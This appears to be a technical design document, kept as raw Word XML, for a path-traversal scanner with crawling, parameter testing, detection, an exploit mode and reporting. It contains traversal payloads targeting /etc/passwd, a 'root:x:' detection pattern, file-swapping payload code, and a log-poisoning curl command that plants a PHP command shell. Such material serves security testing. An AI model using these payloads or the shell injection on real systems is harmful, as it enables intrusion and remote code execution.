6IXEUAoCCAgUG/UA/2gkllIRWDgBgWKtBuAftfRQDQIICBQ79YBAsZBaDL2QGEpBAAGBYqMe4B+NxFIqAgsnIFCs1QD8o5YeqkEAAYFipx4QKBZSi6EXEkMpCCAgUGzUA/yjkVhKRWDhBASKtRqAf9TSQzUIICBQ7NQDAsVCap07d+5/h2H4t1tvvXW47LLLClWmFAQQQOBfBP7xj38MH//4x/MHj+/t7f07NpeeAP+49BqoAAEE1hPgH+sZnfYr+MdpE3c+BBA4CgH+cRRqJ/8egeLJM974DO973/sevHDhwn/dcMMNwwtf+MKN3+eFCCCAwGkS+N3vfjecP39+OHPmzEP33HPPf5/muZ1rNQH+oTMQQKADAf5RTyX+UU8TFSGAwJMJ8I+aXSFQLKTLuXPnbhuG4aarr756ePvb316oMqUggAAC/yLwta99bfjlL3+ZP7h9b2/vZmwuPQH+cek1UAECCKwnwD/WMzrtV/CP0ybufAggcBQC/OMo1E7+PQLFk2e88RnOnTv3H8MwPJrHnt/0pjcN11133cbv9UIEEEDgNAj86Ec/Gr773e/mVI8Pw3DV3t7eY6dxXue4OAH+oUMQQKA6Af5RUyH+UVMXVSGAwL8I8I+63SBQLKbNuXPnbhiG4d6UlZmKr3jFK4Yrr7zSmorFdFIOAksikDVLfv/73w8/+9nPppmJ+fg37u3tnV8Sh+qflX9UV0h9CCyPAP/ooTn/6KGTKhFYEgH+0UNtgWJBnf5p6ndlpmLB8pSEAALLJpCZie8XJtZsAv5RUxdVIYDASIB/FG4E/lFYHKUhgAD/KNoDAsWiwvzz8YP/OXPmzNkLFy78p3CxqFDKQmAZBB4/c+bMIxcuXLhvGIY7PeZcW3T+UVsf1SGwMAL8o5Hg/KORWEpF4KlPgH800Fig2EAkJSKAAAIIIIAAAggggAACCCCAAAIIIFCFgECxihLqQAABBBBAAAEEEEAAAQQQQAABBBBAoAEBgWIDkZSIAAIIIIAAAggggAACCCCAAAIIIIBAFQICxSpKqAMBBBBAAAEEEEAAAQQQQAABBBBAAIEGBASKDURSIgIIIIAAAggggAACCCCAAAIIIIAAAlUICBSrKKEOBBBAAAEEEEAAAQQQQAABBBBAAAEEGhAQKDYQSYkIIIAAAggggAACCCCAAAIIIIAAAghUISBQrKKEOhBAAAEEEEAAAQQQQAABBBBAAAEEEGhAQKDYQCQlIoAAAggggAACCCCAAAIIIIAAAgggUIWAQLGKEupAAAEEEEAAAQQQQAABBBBAAAEEEECgAQGBYgORlIgAAggggAACCCCAAAIIIIAAAggggEAVAgLFKkqoAwEEEEAAAQQQQAABBBBAAAEEEEAAgQYEBIoNRFIiAggggAACCCCAAAIIIIAAAggggAACVQgIFKsooQ4EEEAAAQQQQAABBBBAAAEEEEAAAQQaEBAoNhBJiQgggAACCCCAAAIIIIAAAggggAACCFQhIFCsooQ6EEAAAQQQQAABBBBAAAEEEEAAAQQQaEBAoNhAJCUigAACCCCAAAIIIIAAAggggAACCCBQhYBAsYoS6kAAAQQQQAABBBBAAAEEEEAAAQQQQKABAYFiA5GUiAACCCCAAAIIIIAAAggggAACCCCAQBUCAsUqSqgDAQQQQAABBBBAAAEEEEAAAQQQQACBBgQEig1EUiICCCCAAAIIIIAAAggggAACCCCAAAJVCPwfHd3IA6sDSdwAAAAASUVORK5CYII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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key Advantages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Discovers nested endpoints (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/v1/user?id=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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Maintains session state across crawled pages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Processes 100+ URLs/sec with 10 threads</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="phase-2-parameter-analysis"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Parameter Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_analyze_parameters()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Concurrency</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Parallel parameter testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">def _analyze_parameters(self, url):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    parsed = urlparse(url)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    params = parse_qs(parsed.query)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    for param in params:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        self._test_parameter(url, param, payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter Handling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Query String Extraction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">parse_qs()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Payload Injection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Preserves original parameter values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URL-encodes special characters</w:t>
      </w:r>
      <w:r>
        <w:br/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Combination Tracking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">self.tested_combinations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Example Transformation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Original: https://example.com/profile?id=123</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Test URL: https://example.com/profile?id=../../etc/passwd%00</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="phase-3-vulnerability-detection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Vulnerability Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_test_parameter()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_is_vulnerable()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">def _test_parameter(self, url, param, payload):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    test_url = inject_payload(url, param, payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    response = self.session.get(test_url)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if self._is_vulnerable(response):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        self._add_vulnerability(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Heuristics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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Check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Matches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 Code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response.status_code ==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 OK responses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Patterns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re.search(r'root:x:', text)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/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> signatures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Length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len(text) &gt; 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non-HTML responses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Error Exclusion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'file not found' not in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Filters false positives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Layer Validation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HTTP status code filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS-specific content patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Response length threshold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error message exclusion</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="phase-4-conditional-exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Conditional Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_exploit_vulnerabilities()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CLI flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Features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Target File Selection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Predefined OS files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">win.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Custom wordlist integration</w:t>
      </w:r>
      <w:r>
        <w:br/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Adaptive Payloads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def _generate_exploit_payload(base_payload, target_file):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    decoded = unquote(base_payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    return quote(decoded.replace('passwd', target_file))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RCE Detection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Checks Apache/nginx log paths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Generates exploit guidance:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -A "&lt;?php system($_GET['cmd']);?&gt;" http://target</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="33" w:name="phase-5-unified-reporting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5: Unified Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(New Addition)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_report()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Formats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: JSON, CSV, XML</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Location</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Final phase in workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key Features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Unified Data Model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Combines detection and exploitation findings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Deduplication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Hash-based unique entry tracking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Format-Specific Encoding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def generate_report(data, format):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    if format == 'xml':</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        # XML-safe character escaping</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        cleaned = escape(content.replace('\x00','')) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    elif format == 'csv':</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        # CSV injection prevention</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        content = content.lstrip('=@-+')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Report Structure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"type": "detection",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "url": "https://example.com/profile?id=../etc/passwd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "parameter": "id",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "payload": "%2e%2e%2fetc%2fpasswd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "status": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "length": 1204,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "timestamp": "2024-03-15T14:30:00Z"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drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="304491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ata:image/png;base64,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